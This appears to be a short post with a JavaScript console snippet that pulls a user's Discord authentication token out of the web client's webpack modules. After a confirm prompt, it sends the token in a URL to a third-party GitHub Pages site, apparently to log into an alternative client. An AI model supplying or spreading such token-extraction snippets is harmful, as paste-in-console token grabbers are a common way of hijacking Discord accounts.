this will make getting your discord token easier!
(code inspired by the quests exploit)(() => {
const wpRequire = webpackChunkdiscord_app.push([[Symbol()], {}, (r) => r]);
webpackChunkdiscord_app.pop();
const token = Object.values(wpRequire.c)
.find((x) => x?.exports?.getToken)
.exports.getToken();
if (window.confirm("Token acquired! This will now redirect you to the discordo website.")) {
window.open("https://cyan-2048.github.io/discordo/#token=" + encodeURIComponent(token), "_blank");
}
})();